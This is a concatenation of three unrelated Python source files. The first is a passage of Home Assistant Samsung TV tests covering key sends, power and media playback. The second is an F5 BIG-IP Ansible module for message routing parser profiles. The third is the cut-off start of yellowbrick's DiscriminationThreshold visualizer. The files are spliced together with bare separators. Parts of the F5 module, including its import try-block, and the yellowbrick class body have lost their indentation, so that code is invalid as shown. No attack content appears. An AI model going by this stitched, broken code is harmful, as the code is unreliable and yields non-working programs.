        assert state.state == STATE_ON
async def test_send_key(hass, remote):
    """Test for send key."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_VOLUP")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
    assert state.state == STATE_ON


async def test_send_key_broken_pipe(hass, remote):
    """Testing broken pipe Exception."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # A broken pipe while sending must not crash nor flip the state.
    remote.control = mock.Mock(side_effect=BrokenPipeError("Boom"))
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON


async def test_send_key_connection_closed_retry_succeed(hass, remote):
    """Test retry on connection closed."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # First control() raises ConnectionClosed, the retry succeeds.
    remote.control = mock.Mock(
        side_effect=[exceptions.ConnectionClosed("Boom"), mock.DEFAULT, mock.DEFAULT]
    )
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    # key because of retry two times and update called
    assert remote.control.call_count == 2
    assert remote.control.call_args_list == [
        call("KEY_VOLUP"),
        call("KEY_VOLUP"),
    ]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
    assert state.state == STATE_ON


async def test_send_key_unhandled_response(hass, remote):
    """Testing unhandled response exception."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    remote.control = mock.Mock(side_effect=exceptions.UnhandledResponse("Boom"))
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON


async def test_send_key_websocketexception(hass, remote):
    """Testing websocket exception."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    remote.control = mock.Mock(side_effect=WebSocketException("Boom"))
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON


async def test_send_key_os_error(hass, remote):
    """Testing OSError."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    remote.control = mock.Mock(side_effect=OSError("Boom"))
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON
async def test_name(hass, remote):
    """Test for name property."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    state = hass.states.get(ENTITY_ID)
    # "fake" is the name carried by MOCK_CONFIG
    assert state.attributes[ATTR_FRIENDLY_NAME] == "fake"
async def test_state_with_turnon(hass, remote, delay):
    """Test for state property."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON
    # the delay fixture shows the power-on delay was scheduled exactly once
    assert delay.call_count == 1
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_OFF
async def test_state_without_turnon(hass, remote):
    """Test for state property."""
    # config without turn-on support: state still toggles via OFF service
    await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
    )
    state = hass.states.get(ENTITY_ID_NOTURNON)
    assert state.state == STATE_ON
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
    )
    state = hass.states.get(ENTITY_ID_NOTURNON)
    assert state.state == STATE_OFF
async def test_supported_features_with_turnon(hass, remote):
    """Test for supported_features property."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    state = hass.states.get(ENTITY_ID)
    # turn-on capable config advertises the extra SUPPORT_TURN_ON flag
    assert (
        state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV | SUPPORT_TURN_ON
    )
async def test_supported_features_without_turnon(hass, remote):
    """Test for supported_features property."""
    await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
    state = hass.states.get(ENTITY_ID_NOTURNON)
    assert state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV
async def test_device_class(hass, remote):
    """Test for device_class property."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    state = hass.states.get(ENTITY_ID)
    assert state.attributes[ATTR_DEVICE_CLASS] == DEVICE_CLASS_TV
async def test_turn_off_websocket(hass, remote):
    """Test for turn_off."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key called
    # websocket bridge powers off with KEY_POWER
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_POWER")]
async def test_turn_off_legacy(hass):
    """Test for turn_off."""
    # Patch Remote so config_flow detection fails once (OSError) and falls
    # back to the legacy SamsungRemote protocol.
    with patch("homeassistant.components.samsungtv.config_flow.socket"), patch(
        "homeassistant.components.samsungtv.config_flow.Remote",
        side_effect=[OSError("Boom"), mock.DEFAULT],
    ), patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote_class, patch(
        "homeassistant.components.samsungtv.socket"
    ):
        remote = mock.Mock()
        remote_class.return_value = remote
        await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
        assert await hass.services.async_call(
            DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
        )
        # key called
        # legacy bridge powers off with KEY_POWEROFF (not KEY_POWER)
        assert remote.control.call_count == 1
        assert remote.control.call_args_list == [call("KEY_POWEROFF")]
async def test_turn_off_os_error(hass, remote, caplog):
    """Test for turn_off with OSError."""
    caplog.set_level(logging.DEBUG)
    await setup_samsungtv(hass, MOCK_CONFIG)
    # OSError on close is only logged, not raised
    remote.close = mock.Mock(side_effect=OSError("BOOM"))
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    assert "Could not establish connection." in caplog.text
async def test_volume_up(hass, remote):
    """Test for volume_up."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_VOLUP")]
    # connection is closed after each command
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_volume_down(hass, remote):
    """Test for volume_down."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_VOLUME_DOWN, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_VOLDOWN")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_mute_volume(hass, remote):
    """Test for mute_volume."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN,
        SERVICE_VOLUME_MUTE,
        {ATTR_ENTITY_ID: ENTITY_ID, ATTR_MEDIA_VOLUME_MUTED: True},
        True,
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_MUTE")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_media_play(hass, remote):
    """Test for media_play."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_MEDIA_PLAY, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_PLAY")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_media_pause(hass, remote):
    """Test for media_pause."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_MEDIA_PAUSE, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_PAUSE")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_media_next_track(hass, remote):
    """Test for media_next_track."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_MEDIA_NEXT_TRACK, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    # next/previous track map to channel up/down on a TV
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_CHUP")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_media_previous_track(hass, remote):
    """Test for media_previous_track."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_MEDIA_PREVIOUS_TRACK, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_CHDOWN")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_turn_on_with_turnon(hass, remote, delay):
    """Test turn on."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, True
    )
    # the power-on delay was scheduled once
    assert delay.call_count == 1
async def test_turn_on_without_turnon(hass, remote):
    """Test turn on."""
    await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
    assert await hass.services.async_call(
        DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
    )
    # nothing called as not supported feature
    assert remote.control.call_count == 0
async def test_play_media(hass, remote):
    """Test for play_media."""
    asyncio_sleep = asyncio.sleep
    sleeps = []
    # Replacement for asyncio.sleep: records the requested delay, then
    # yields control without actually waiting (keeps the test fast).
    async def sleep(duration, loop):
        sleeps.append(duration)
        await asyncio_sleep(0, loop=loop)
    await setup_samsungtv(hass, MOCK_CONFIG)
    with patch("asyncio.sleep", new=sleep):
        # playing channel "576" is typed out digit by digit
        assert await hass.services.async_call(
            DOMAIN,
            SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: ENTITY_ID,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
                ATTR_MEDIA_CONTENT_ID: "576",
            },
            True,
        )
        # keys and update called
        assert remote.control.call_count == 4
        assert remote.control.call_args_list == [
            call("KEY_5"),
            call("KEY_7"),
            call("KEY_6"),
            call("KEY_ENTER"),
        ]
        assert remote.close.call_count == 1
        assert remote.close.call_args_list == [call()]
        # one inter-key delay between each of the 4 key presses
        assert len(sleeps) == 3
async def test_play_media_invalid_type(hass, remote):
    """Test for play_media with invalid media type."""
    # NOTE: this patch shadows the `remote` fixture; inside the block `remote`
    # is the mocked SamsungRemote class, so `remote.call_count` counts
    # constructor calls (one per state update).
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
        url = "https://example.com"
        await setup_samsungtv(hass, MOCK_CONFIG)
        assert await hass.services.async_call(
            DOMAIN,
            SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: ENTITY_ID,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_URL,
                ATTR_MEDIA_CONTENT_ID: url,
            },
            True,
        )
        # only update called
        assert remote.control.call_count == 0
        assert remote.close.call_count == 0
        assert remote.call_count == 1
async def test_play_media_channel_as_string(hass, remote):
    """Test for play_media with invalid channel as string."""
    # same fixture-shadowing pattern as above
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
        url = "https://example.com"
        await setup_samsungtv(hass, MOCK_CONFIG)
        assert await hass.services.async_call(
            DOMAIN,
            SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: ENTITY_ID,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
                ATTR_MEDIA_CONTENT_ID: url,
            },
            True,
        )
        # only update called
        assert remote.control.call_count == 0
        assert remote.close.call_count == 0
        assert remote.call_count == 1
async def test_play_media_channel_as_non_positive(hass, remote):
    """Test for play_media with invalid channel as non positive integer."""
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
        await setup_samsungtv(hass, MOCK_CONFIG)
        assert await hass.services.async_call(
            DOMAIN,
            SERVICE_PLAY_MEDIA,
            {
                ATTR_ENTITY_ID: ENTITY_ID,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
                ATTR_MEDIA_CONTENT_ID: "-4",
            },
            True,
        )
        # only update called
        assert remote.control.call_count == 0
        assert remote.close.call_count == 0
        assert remote.call_count == 1
async def test_select_source(hass, remote):
    """Test for select_source."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    assert await hass.services.async_call(
        DOMAIN,
        SERVICE_SELECT_SOURCE,
        {ATTR_ENTITY_ID: ENTITY_ID, ATTR_INPUT_SOURCE: "HDMI"},
        True,
    )
    # key and update called
    assert remote.control.call_count == 1
    assert remote.control.call_args_list == [call("KEY_HDMI")]
    assert remote.close.call_count == 1
    assert remote.close.call_args_list == [call()]
async def test_select_source_invalid_source(hass, remote):
    """Test for select_source with invalid source."""
    # patch shadows the fixture: `remote` is the mocked SamsungRemote class
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
        await setup_samsungtv(hass, MOCK_CONFIG)
        assert await hass.services.async_call(
            DOMAIN,
            SERVICE_SELECT_SOURCE,
            {ATTR_ENTITY_ID: ENTITY_ID, ATTR_INPUT_SOURCE: "INVALID"},
            True,
        )
        # only update called
        assert remote.control.call_count == 0
        assert remote.close.call_count == 0
        assert remote.call_count == 1
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2019, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_message_routing_protocol
short_description: Manage generic message parser profile.
description:
- Manages generic message parser profile for use with the message routing framework.
version_added: 2.9
options:
name:
description:
- Specifies the name of the generic parser profile.
required: True
type: str
description:
description:
- The user defined description of the generic parser profile.
type: str
parent:
description:
- The parent template of this parser profile. Once this value has been set, it cannot be changed.
- When creating a new profile, if this parameter is not specified,
the default is the system-supplied C(genericmsg) profile.
type: str
disable_parser:
description:
- When C(yes), the generic message parser will be disabled ignoring all incoming packets and not directly
send message data.
- This mode supports iRule script protocol implementations that will generate messages from the incoming transport
stream and send outgoing messages on the outgoing transport stream.
type: bool
max_egress_buffer:
description:
- Specifies the maximum size of the send buffer in bytes. If the number of bytes in the send buffer for a
connection exceeds this value, the generic message protocol will stop receiving outgoing messages from the
        router until the size of the buffer drops below this setting.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
max_msg_size:
description:
- Specifies the maximum size of a received message. If a message exceeds this size, the connection will be reset.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
msg_terminator:
description:
- The string of characters used to terminate a message. If the message-terminator is not specified,
the generic message parser will not separate the input stream into messages.
type: str
no_response:
description:
- When set, matching of responses to requests is disabled.
type: bool
partition:
description:
- Device partition to create route object on.
type: str
default: Common
state:
description:
- When C(present), ensures that the route exists.
- When C(absent), ensures the route is removed.
type: str
choices:
- present
- absent
default: present
notes:
- Requires BIG-IP >= 14.0.0
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a generic parser
bigip_message_routing_protocol:
name: foo
description: 'This is parser'
no_response: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Modify a generic parser
bigip_message_routing_protocol:
name: foo
no_response: no
max_egress_buffer: 10000
max_msg_size: 2000
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove generic parser
bigip_message_routing_protocol:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The user defined description of the parser profile.
returned: changed
type: str
sample: My description
parent:
description: The parent template of this parser profile.
returned: changed
type: str
sample: /Common/genericmsg
disable_parser:
description: Disables generic message parser.
returned: changed
type: bool
sample: yes
max_egress_buffer:
description: The maximum size of the send buffer in bytes.
returned: changed
type: int
sample: 10000
max_msg_size:
description: The maximum size of a received message.
returned: changed
type: int
sample: 4000
msg_terminator:
description: The string of characters used to terminate a message.
returned: changed
type: str
sample: '%%%%'
no_response:
description: Disables matching of responses to requests.
returned: changed
type: bool
sample: yes
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.compare import cmp_str_with_none
from library.module_utils.network.f5.icontrol import tmos_version
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.compare import cmp_str_with_none
from ansible.module_utils.network.f5.icontrol import tmos_version
class Parameters(AnsibleF5Parameters):
    """Shared parameter definitions mapping module options to API attributes."""
    # Translation table: REST API attribute name -> module option name.
    api_map = {
        'defaultsFrom': 'parent',
        'disableParser': 'disable_parser',
        'maxEgressBuffer': 'max_egress_buffer',
        'maxMessageSize': 'max_msg_size',
        'messageTerminator': 'msg_terminator',
        'noResponse': 'no_response',
    }
    # Attributes sent to the device (REST-side names).
    api_attributes = [
        'description',
        'defaultsFrom',
        'disableParser',
        'maxEgressBuffer',
        'maxMessageSize',
        'messageTerminator',
        'noResponse',
    ]
    # Values reported back to the user (module-side names).
    returnables = [
        'description',
        'parent',
        'disable_parser',
        'max_egress_buffer',
        'max_msg_size',
        'msg_terminator',
        'no_response',
    ]
    # Values compared by Difference to decide whether an update is needed.
    updatables = [
        'description',
        'parent',
        'disable_parser',
        'max_egress_buffer',
        'max_msg_size',
        'msg_terminator',
        'no_response',
    ]
    @property
    def no_response(self):
        # flatten_boolean (F5 module_utils helper) normalizes bool-ish input.
        return flatten_boolean(self._values['no_response'])
    @property
    def disable_parser(self):
        return flatten_boolean(self._values['disable_parser'])
class ApiParameters(Parameters):
    """Parameters as read from the device API; no extra normalization needed."""
    pass
class ModuleParameters(Parameters):
    """Validates and normalizes the user-supplied module options.

    Properties translate task inputs into the form expected by the BIG-IP
    REST API and reject out-of-range values with ``F5ModuleError``.
    """
    def _check_uint32(self, name):
        # Shared range validator: both size options are 32-bit unsigned
        # integer fields on the API (0 - 4294967295 inclusive).
        value = self._values[name]
        if value is None:
            return None
        if 0 <= value <= 4294967295:
            return value
        raise F5ModuleError(
            "Valid '{0}' must be in range 0 - 4294967295.".format(name)
        )
    @property
    def parent(self):
        # Fully qualify the parent profile with the partition,
        # e.g. 'genericmsg' -> '/Common/genericmsg'.
        if self._values['parent'] is None:
            return None
        result = fq_name(self.partition, self._values['parent'])
        return result
    @property
    def max_msg_size(self):
        # Maximum size of a received message (connection resets beyond it).
        return self._check_uint32('max_msg_size')
    @property
    def max_egress_buffer(self):
        # Maximum size of the send buffer in bytes.
        return self._check_uint32('max_egress_buffer')
class Changes(Parameters):
    def to_return(self):
        """Collect all returnable values into a filtered dict for reporting."""
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            # NOTE(review): broad catch is upstream F5 boilerplate -- a failing
            # property yields a partial, unfiltered result instead of an error.
            pass
        return result
class UsableChanges(Changes):
    """Changes in the form sent to the device API."""
    pass
class ReportableChanges(Changes):
    """Changes in the form reported back to the Ansible user."""
    pass
class Difference(object):
    """Computes which parameters differ between desired and current state.

    ``want`` holds the user-requested values, ``have`` the values currently
    on the device. ``compare`` returns the desired value when it differs,
    otherwise ``None``.
    """
    def __init__(self, want, have=None):
        self.want = want
        self.have = have
    def compare(self, param):
        # Use a dedicated comparison property when one exists on this class;
        # otherwise fall back to the generic attribute comparison.
        try:
            return getattr(self, param)
        except AttributeError:
            return self.__default(param)
    def __default(self, param):
        want_value = getattr(self.want, param)
        try:
            have_value = getattr(self.have, param)
            if want_value != have_value:
                return want_value
        except AttributeError:
            # 'have' lacks the attribute entirely; report the desired value.
            return want_value
    @property
    def parent(self):
        # The parent profile is immutable on the device; changing it is an error.
        if self.want.parent is None:
            return None
        if self.want.parent != self.have.parent:
            raise F5ModuleError(
                "The parent router profile cannot be changed."
            )
    @property
    def description(self):
        # cmp_str_with_none treats None and "none" sentinels consistently.
        return cmp_str_with_none(self.want.description, self.have.description)
    @property
    def msg_terminator(self):
        return cmp_str_with_none(self.want.msg_terminator, self.have.msg_terminator)
class ModuleManager(object):
    """Orchestrates the module: diffs desired vs device state and applies it.

    Talks to the BIG-IP via F5RestClient against the
    /mgmt/tm/ltm/message-routing/generic/protocol collection.
    """
    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = F5RestClient(**self.module.params)
        self.want = ModuleParameters(params=self.module.params)
        self.have = ApiParameters()
        self.changes = UsableChanges()
    def _set_changed_options(self):
        # On create: every explicitly-set option counts as a change.
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)
    def _update_changed_options(self):
        # On update: only options that differ from the device state count.
        # Returns True when at least one updatable changed.
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False
    def _announce_deprecations(self, result):
        # Surface any queued deprecation warnings through Ansible.
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.client.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )
    def version_less_than_14(self):
        # Message routing only exists on TMOS >= 14.0.0.
        version = tmos_version(self.client)
        if LooseVersion(version) < LooseVersion('14.0.0'):
            return True
        return False
    def exec_module(self):
        """Entry point: enforce state and return the changed-result dict."""
        if self.version_less_than_14():
            raise F5ModuleError('Message routing is not supported on TMOS version below 14.x')
        changed = False
        result = dict()
        state = self.want.state
        if state == "present":
            changed = self.present()
        elif state == "absent":
            changed = self.absent()
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        return result
    def present(self):
        # Ensure the profile exists with the desired settings.
        if self.exists():
            return self.update()
        else:
            return self.create()
    def absent(self):
        # Ensure the profile is removed; False when nothing to do.
        if self.exists():
            return self.remove()
        return False
    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False
    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        # check_mode reports 'would change' without touching the device
        if self.module.check_mode:
            return True
        self.update_on_device()
        return True
    def remove(self):
        if self.module.check_mode:
            return True
        self.remove_from_device()
        # Verify the delete actually took effect.
        if self.exists():
            raise F5ModuleError("Failed to delete the resource.")
        return True
    def create(self):
        self._set_changed_options()
        if self.module.check_mode:
            return True
        self.create_on_device()
        return True
    def exists(self):
        """Return True when the profile is present on the device."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError:
            # non-JSON body: treat as absent
            return False
        if resp.status == 404 or 'code' in response and response['code'] == 404:
            return False
        return True
    def create_on_device(self):
        """POST the new profile to the device."""
        params = self.changes.api_params()
        params['name'] = self.want.name
        params['partition'] = self.want.partition
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        # 409 = conflict (already exists), 400 = bad request
        if 'code' in response and response['code'] in [400, 409]:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return True
    def update_on_device(self):
        """PATCH only the changed attributes onto the existing profile."""
        params = self.changes.api_params()
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.patch(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
    def remove_from_device(self):
        """DELETE the profile from the device."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        response = self.client.api.delete(uri)
        if response.status == 200:
            return True
        raise F5ModuleError(response.content)
    def read_current_from_device(self):
        """GET the profile's current settings as ApiParameters."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return ApiParameters(params=response)
class ArgumentSpec(object):
    """Declares the argument spec this module hands to AnsibleModule."""
    def __init__(self):
        # check mode is fully supported by ModuleManager
        self.supports_check_mode = True
        module_args = dict(
            name=dict(required=True),
            description=dict(),
            parent=dict(),
            disable_parser=dict(type='bool'),
            max_egress_buffer=dict(type='int'),
            max_msg_size=dict(type='int'),
            msg_terminator=dict(),
            no_response=dict(type='bool'),
            partition=dict(
                default='Common',
                fallback=(env_fallback, ['F5_PARTITION'])
            ),
            state=dict(
                default='present',
                choices=['present', 'absent']
            )
        )
        # Start from the shared F5 connection options, then layer the
        # module-specific options on top (module options win on collisions).
        self.argument_spec = dict(f5_argument_spec)
        self.argument_spec.update(module_args)
def main():
    """Module entry point: build the spec, run the manager, report results."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
    )
    try:
        manager = ModuleManager(module=module)
        # exit_json flattens the result dict into the module's return values
        module.exit_json(**manager.exec_module())
    except F5ModuleError as ex:
        module.fail_json(msg=str(ex))
if __name__ == '__main__':
    main()
| |
# yellowbrick.classifier.threshold
# DiscriminationThreshold visualizer for probabilistic classifiers.
#
# Author: Nathan Danielsen <ndanielsen@gmail.com>
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Wed April 26 20:17:29 2017 -0700
#
# ID: threshold.py [] nathan.danielsen@gmail.com $
"""
DiscriminationThreshold visualizer for probabilistic classifiers.
"""
##########################################################################
## Imports
##########################################################################
import bisect
import numpy as np
from scipy.stats import mstats
from collections import defaultdict
from yellowbrick.base import ModelVisualizer
from yellowbrick.style.colors import resolve_colors
from yellowbrick.utils import is_classifier, is_probabilistic, is_monotonic
from yellowbrick.exceptions import YellowbrickTypeError, YellowbrickValueError
from sklearn.base import clone
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import precision_recall_curve
from sklearn.utils import indexable, safe_indexing
from sklearn.utils.multiclass import type_of_target
# Quantiles for lower bound, curve, and upper bound
# (curve drawn at the median, band from 10th to 90th percentile)
QUANTILES_MEDIAN_80 = np.array([0.1, 0.5, 0.9])
# List of threshold metrics
METRICS = ["precision", "recall", "fscore", "queue_rate"]
##########################################################################
# Discrimination Thresholds Visualization
##########################################################################
class DiscriminationThreshold(ModelVisualizer):
"""
Visualizes how precision, recall, f1 score, and queue rate change as the
discrimination threshold increases. For probabilistic, binary classifiers,
the discrimination threshold is the probability at which you choose the
